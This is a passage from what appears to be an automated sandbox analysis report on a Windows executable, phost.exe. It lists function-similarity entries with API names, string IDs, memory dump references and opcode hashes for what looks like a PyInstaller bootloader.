                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction ID: 07b66756d860e6a00321df7a4c2dc61a50186ec795e5f134d52ede683c53e023
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8918132B08A4645EF66AE29D850BBF36B1AB40BE4F444335DA5AC73D6DF3CE4458302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction ID: ecdcd835cf6a9ee2b43269b9b8425ff971e6cc1a1ff5728d8ea65714d6c72f9e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A81B232F0824285FF764F2D8910A7A36B0EB11BE8F558235DA09D7299DF2FE9418313
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                              • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                              • Instruction ID: 21bbfdc4fa60d17526116b583176e3885801a3bbe3f33e284f4aab1bed00e6c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A451A132B196028ADF14DF19D844A3877B9FB44BA8F108131DA4E8B788EF3CE845D741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                              • Instruction ID: 71abcc4a0febba02130c528a847957e0da1846a5304bbb3aa2e0e1e6892a3284
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F619672A08BC586DB608B19E8803A9B7A4FB857E4F044225EB9C8B755DF7CD194DB01
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                              • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                              • Instruction ID: bd5a4164d423adf75e06bd5a3144e6854cb2a762906e608b69796281511c8d29
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E51A272B082828AEF648F29D88436837B8FB55BA4F144135DA5D8BB95CF3DE464D702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF62CC7352C,?,00000000,00007FF62CC73F23), ref: 00007FF62CC77F22
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                              • Instruction ID: ce0b23117cffd9741204111f3d758072f330bca0d4929f9d4084e34202f3c580
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9731D661719AC545FF218B29EC503AA6378EF84BF4F044231EA6D8BBC9DE2CD649D701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                              • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction ID: 24a560f3479708726e57acc49923e0921f0c0e9960ba8f992fff7ca860bd29c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6821DE73B08B4192EB209B19F8447EA63B4FB88794F404136EE8D9776ADE3CD249C741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction ID: d8d26d22b35318288283e7525eb07668d1e85dade767e9df46366f2c9971b01a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D11472B19A818AEB11CF69D8406ED37B1FB447E8B448236DE5ED7B89DE38D046C341
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction ID: 9e3e78a9366c6c5261d8b800243136ec92a4df68d373ed967d5fba4a87944466
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2251D372F081128AFF25DF289D55ABD27B1AB407B8F504235DE1ED2AE5DF39A4428701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                              • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                              • Instruction ID: 29793d33bfc6032f87cb60117973c068b6ae1cb61288d16ba602b48e55620ad9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D516D62F086418AFF11DF79D8507BE23B2AB48BA8F148635DE4D9B689DF78D4418702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction ID: cd2147f3bebf089ffe8f942daa7e0d08e6bf949f80addf632e2bc888a597300d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B411AC31F1C14282FE54976DED4427952B5FF857A4F448030DB498BB9DCD2DD899A602
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                              • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                              • Instruction ID: b7cc968165eee0f38db95e1a7453134d57cab0086e7c4270e46766b882815d25
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0411922F1C68245FF259B29DC0177A66B0EB84BB8F148336EE5C86AD5DE3CD441C701
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF62CC890B6
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF62CC8A9B8: GetLastError.KERNEL32(?,?,?,00007FF62CC92D92,?,?,?,00007FF62CC92DCF,?,?,00000000,00007FF62CC93295,?,?,?,00007FF62CC931C7), ref: 00007FF62CC8A9D8
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62CC7CC15), ref: 00007FF62CC890D4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                              • API String ID: 3580290477-3962158096
                                                                                                                                                                                                                              • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                              • Instruction ID: 6092133590d028b7397a533541ae74e3ffc510a30d331cd87eafde9870ce62ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29416D32B08A5285EF1A9F29DC444BA23B4EB457E4B554135E94EC3B85DE3DE482C302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                              • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                              • Instruction ID: 3a1dd2001475c2807039a6aea3c7ce3c551dede802cbbb48c34d65f8ce13dd8d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED41A032B19A9181DB619F29E8447AA67A0FB887E4F404136EA4DC7B98EF3CD401C741
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62cc70000_phost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                              • Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                              • Instruction ID: 9d2c86d8cd478c54ee3e874a0b3b69098077f951905a6eb395963df330aed0fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94214872B0868182FF218B19D81463E33B1FB84B94F918235C68C83288DF7DE545C742
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.2192722468.00007FF62CC71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62CC70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192646044.00007FF62CC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192849143.00007FF62CC9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2192949511.00007FF62CCB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.2193113716.00007FF62CCB4000.00000002.00000001.01000000.00000003.sdmpDownload File
